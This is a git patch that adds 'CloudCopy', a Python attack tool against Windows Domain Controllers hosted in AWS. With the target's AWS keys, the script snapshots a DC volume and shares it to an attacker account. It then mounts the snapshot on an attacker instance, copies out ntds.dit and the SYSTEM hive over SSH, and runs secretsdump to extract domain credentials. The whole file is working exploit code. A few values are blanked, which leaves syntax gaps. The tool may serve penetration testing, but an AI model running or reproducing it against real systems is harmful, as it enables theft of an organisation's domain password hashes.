From 26133279d33ef241651d84cdedde41c6a719ed7e Mon Sep 17 00:00:00 2001 From: Static-Flow Date: Fri, 17 May 2019 07:46:37 -0500 Subject: [PATCH] This is the AWS version of the CloudCopy attack against Domain Controllers running in AWS. --- | 219 +++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 219 insertions(+) create mode 100644 diff --git a/ b/ new file mode 100644 index 0000000..f22842e --- /dev/null +++ b/ @@ -0,0 +1,219 @@ +""" +CloudCopy algorithm + +IN: + Target AWS Creds: AWS Secret and AWS Access ID + Attacker AWS Creds: AWS Secret and AWS Access ID + Attacker Key File: Key file for accessing new instance + Attacker Account Id: Attacker account id used for sharing target snapshot with your account +ALGO: + 1. Load AWS CLI with Target Creds + 2. Run Describe-Instances and show in list to select + 3. Run Create-Snapshot on volume from selected instance + 4. Run modify-snapshot-attribute on new snapshot to set createVolumePermission to attacker AWS Account + 5. Load AWS CLI with Attacker Creds + 6. Find current AMI + aws ec2 describe-images --owners amazon --filters 'Name=name,Values=amzn2-ami-hvm-2.0.????????-x86_64-gp2' + 'Name=state,Values=available' --output json | jq -r '.Images | sort_by(.CreationDate) | last(.[]).ImageId' + 7. Run run-instance command to create new linux ec2 with our stolen snapshot + aws ec2 run-instances --image-id ami-0c6b1d09930fac512 --count 1 --instance-type t2.micro + --key-name {AttackerKey} --block-device-mappings '[{"DeviceName":"/dev/sdf","Ebs":{"SnapshotId":"{SNAP_ID}"}}]' + 8. Ssh run "sudo mkdir /windows" + 9. Ssh run "sudo mount /dev/xvdf1 /windows/" + 10. Ssh run "sudo cp /windows/Windows/NTDS/ntds.dit /home/ec2-user" + 11. Ssh run "sudo cp /windows/Windows/System32/config/SYSTEM /home/ec2-user" + 12. Ssh run "sudo chown ec2-user:ec2-user /home/ec2-user/*" + 13. SFTP get "/home/ec2-user/SYSTEM ./SYSTEM" + 14. SFTP get "/home/ec2-user/ntds.dit ./ntds.dit" + 15. locally run " -system ./SYSTEM -ntds ./ntds.dit local -outputfile secrets #expects secretsdump to be on path +OUT: + secrets dump output files +""" +import argparse +import sys +import time +import warnings + +import boto3 +from botocore.exceptions import ClientError +from tqdm import tqdm + +warnings.filterwarnings(action='ignore', module='.*paramiko.*') +parser = argparse.ArgumentParser() +parser.add_argument("youraccountid", help="your account id for stealing snapshot") +parser.add_argument("yourinstancekey", help="your private key name (without .pem) for accessing the instance") +parser.add_argument("localkeypath", help="local path to key for ssh'ing to new instance") +parser.add_argument("targetaccesskey", help="target AWS Access Key for making snapshot") +parser.add_argument("targetsecretkey", help="target AWS Secret Key for making snapshot") +parser.add_argument("youracccesskey", help="your AWS Access Key for making instance") +parser.add_argument("yoursecretkey", help="your AWS Secret Key for making instance") + +args = parser.parse_args() + +def viewBar(a,b): + # original version + res = a/int(b)*100 + sys.stdout.write('\rComplete precent: %.2f %%' % (res)) + sys.stdout.flush() + +def tqdmWrapViewBar(*args, **kwargs): + try: + from tqdm import tqdm + except ImportError: + # tqdm not installed - construct and return dummy/basic versions + class Foo(): + @classmethod + def close(*c): + pass + return viewBar, Foo + else: + pbar = tqdm(*args, **kwargs) # make a progressbar + last = [0] # last known iteration, start at 0 + def viewBar2(a, b): + = int(b) + pbar.update(int(a - last[0])) # update pbar with increment + last[0] = a # update last known iteration + return viewBar2, pbar # return callback, tqdmInstance + +if args.targetaccesskey is args.targetsecretkey is args.youraccountid is args.yourinstancekey is args.localkeypath is None: + parser.print_help() +elif ".pem" in args.yourinstancekey: + print("I said no .pem for the key. Try again.") +else: + ec2 = boto3.client('ec2', aws_access_key_id=args.targetaccesskey, aws_secret_access_key=args.targetsecretkey) + instances = ec2.describe_instances()['Reservations'] + for index, instance in enumerate(instances): + if 'Tags' in instance['Instances'][0]: + print(str(index) + ' - ' + instance['Instances'][0]['InstanceId'] + ":" + + instance['Instances'][0]['Tags'][0]['Value']) + + instanceIndex = int(input("which instance are we CloudCopying today?")) + instance = instances[instanceIndex]['Instances'][0]['InstanceId'] + instanceVolume = instances[instanceIndex]['Instances'][0]['BlockDeviceMappings'][0]['Ebs']['VolumeId'] + print("Instance to CloudCopy: " + instance) + print("Instance Volume to Snapshot: " + instanceVolume) + try: + ec2.create_snapshot(VolumeId=instanceVolume, DryRun=True) + except ClientError as e: + if e.response['Error']['Code'] == 'DryRunOperation': + print("Success") + elif e.response['Error']['Code'] == 'UnauthorizedOperation': + print("We do not have the Ec2:CreateSnapshot permission. This attack will not succeed. K-Bye.") + exit(0) + + response = ec2.create_snapshot(VolumeId=instanceVolume, DryRun=False) + ec2Snapshot = boto3.resource('ec2', aws_access_key_id=args.targetaccesskey, aws_secret_access_key=args.targetsecretkey) + snapshot = ec2Snapshot.Snapshot(response['SnapshotId']) + print( + snapshot.load() + with tqdm(total=100) as progress: + while snapshot.state != 'completed': + snapshot.load() + progAmount = int(snapshot.progress.split('%')[0]) + progress.update(progAmount - progress.n) + time.sleep(0.1) + snapshot.load() + else: + progress.update(progAmount - progress.n) + + snapshot.modify_attribute(Attribute='createVolumePermission', + CreateVolumePermission={'Add': [{'UserId': args.youraccountid}]}) + + print("Snapshot should have been shared. Switching to attacker account.") +# switch to attacker, we use the .aws file for the attacker unless the specify it + if args.yoursecretkey is not None and args.youracccesskey is not None: + ec2 = boto3.client("ec2", aws_access_key_id=args.youracccesskey, aws_secret_access_key=args.yoursecretkey) + else: + ec2 = boto3.client("ec2") + + if args.yoursecretkey is not None and args.youracccesskey is not None: + ec2Resource = boto3.resource("ec2", aws_access_key_id=args.youracccesskey, aws_secret_access_key=args.yoursecretkey) + else: + ec2Resource = boto3.resource("ec2") + + response = ec2.describe_snapshots( + SnapshotIds=[ +, + ], + )['Snapshots'] + while len(response) == 0: + response = ec2.describe_snapshots( + SnapshotIds=[ +, + ],)['Snapshots'] + print("Snapshot hasn't arrived, waiting...") + time.sleep(10) + + print("We have the snapshot in our control time to mount it to an instance!") + + security_group_id = None + try: + existingSecurityGroup = ec2.describe_security_groups( + GroupNames=[ + 'CredStealerSsh', + ], + )['SecurityGroups'][0] + print("Found existing security group: " + existingSecurityGroup["GroupId"] + ". Someone's done this before ;)") + security_group_id = existingSecurityGroup["GroupId"] + except ClientError: + security_group_id = ec2.create_security_group( + Description='For connecting to cred stealing instance.', + GroupName='CredStealerSsh' + )['GroupId'] + ec2.authorize_security_group_ingress(GroupId=security_group_id, IpProtocol="tcp", CidrIp="", + FromPort=22, ToPort=22) + print("Finished creating security group for instance") + + newInstance = ec2.run_instances( + BlockDeviceMappings=[{ + "DeviceName": '/dev/sdf', + "Ebs": { + "SnapshotId": + } + }], + SecurityGroupIds=[ + security_group_id, + ], + SecurityGroups=[ + 'CredStealerSsh', + ], + ImageId='ami-0c6b1d09930fac512', + MaxCount=1, + MinCount=1, + InstanceType='t2.micro', + KeyName=args.yourinstancekey + ) + newInstanceId = newInstance['Instances'][0]['InstanceId'] + print("instance: " + newInstanceId) + + instance = ec2Resource.Instance(newInstanceId) + while instance.state['Name'].strip() == "running": + print(instance.state['Name'], 'running') + print("Your instance will be arriving shortly...") + time.sleep(10) + print("Your instance has arrived. Time to get some sweet sweet creds!") + + import paramiko + cbk, pbar = tqdmWrapViewBar(ascii=True, unit='b', unit_scale=True) + key = paramiko.RSAKey.from_private_key_file(args.localkeypath) + connection = paramiko.SSHClient() + connection.set_missing_host_key_policy(paramiko.AutoAddPolicy()) + print("Connecting to instance") + connection.connect(hostname='', username='ec2-user', pkey=key) + sftp = connection.open_sftp() + stdin, stdout, stderr = connection.exec_command("sudo mkdir /windows") + stdin, stdout, stderr = connection.exec_command("sudo mount /dev/xvdf1 /windows/") + stdin, stdout, stderr = connection.exec_command("sudo cp /windows/Windows/NTDS/ntds.dit /home/ec2-user/ntds.dit") + stdin, stdout, stderr = connection.exec_command("sudo cp /windows/Windows/System32/config/SYSTEM /home/ec2-user/SYSTEM") + stdin, stdout, stderr = connection.exec_command("sudo chown ec2-user:ec2-user /home/ec2-user/*") + print("Pulling the files...") + try: + sftp.get("/home/ec2-user/SYSTEM", "./SYSTEM", callback=cbk) + sftp.get("/home/ec2-user/ntds.dit", "./ntds.dit", callback=cbk) + except PermissionError: + print("hmm we don't seem to have control of the files. Maybe just sftp in yourself and run this part.") + sftp.close() + cbk = pbar = None # keeps trying to print out status after the files are already copied + print("finally gonna run secretsdump!") + import subprocess +["", "-system", "./SYSTEM", "-ntds", "./ntds.dit", "local", "-outputfile", "secrets"]) \ No newline at end of file